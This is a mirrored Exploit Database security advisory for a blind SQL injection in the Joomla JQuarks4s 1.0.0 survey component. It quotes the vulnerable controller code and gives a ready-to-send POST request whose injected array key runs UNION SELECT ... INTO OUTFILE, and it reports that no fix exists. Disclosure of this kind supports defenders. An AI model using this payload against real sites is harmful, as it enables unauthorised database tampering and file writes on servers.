Joomla! Component JQuarks4s 1.0.0 – Blind SQL Injection

• Exploit Database
• 36 阅读

• 作者： Salvatore Fresta
  日期： 2010-11-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15466/

• JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability
  
   NameJQuarks4s
   Vendorhttp://www.iptechinside.com/labs/projects/list_files/jquarks-for-surveys
   Versions Affected 1.0.0
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-11-08
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  A Joomla 1.5 free and open source tool for online surveys
  and statistical analysis.
  
  
  II. DESCRIPTION
  _______________
  
  A parameter is not properly sanitised beforebeingused
  in a SQL query.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Blind SQL Injection
   
  
  A) Blind SQL Injection
  _______________________
  
  Inputpassedtothe"q" parameterin when "option"
  is set to "com_jquarks4s" and "task" to "submitSurvey" is
  not properly verified beforebeingused in a SQL query.
  Thiscanbeexploited tomanipulateSQLqueriesby
  injecting arbitrary SQL code.
  
  The following is the vulnerable code (controller.php):
  
  
  function submitSurvey()
  {
  // get post data
  $data = JRequest::get('post');
  
  ...
  
  $questions = $data['q'];
  // debug
  //var_dump($data);exit;
  foreach ($questions as $question_id => $question) :
  
  $type_id = (int)$question['type_id'];
  
  switch ($type_id) :
  
  ...
  
  case 4:
  // recuperer les row_id du question_id
  $rowsDB = $sessionModel->getRows($question_id);
  
  
  So,$question_idisa key of the array "q" and type_id
  his value. Thereforetheinjection is possibileby
  insertingarbitrary SQL code as the key of the array and
  4 as his value.
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Blind SQL Injection
  
  Trytosend the following packet to yourtestserver.
  Ensure thatmagic_quotes_gpcisset to off in order to
  use the following test.
  
  
  POST /path/index.php HTTP/1.1
  Host: target
  Content-Type: application x-www-form-urlencoded
  Content-Length: 97
  
  option=com_jquarks4s&task=submitSurvey&q[-1 UNION SELECT 0x414141 INTO OUTFILE '/tmp/trycopy' ]=4
  
  
  Note that if you want to use the '=' character, youmust
  covert it in URL encode format (%3D), otherwise the value
  4 needed for the injection cannot be read.
  
  
  V. FIX
  ______
  
  No fix.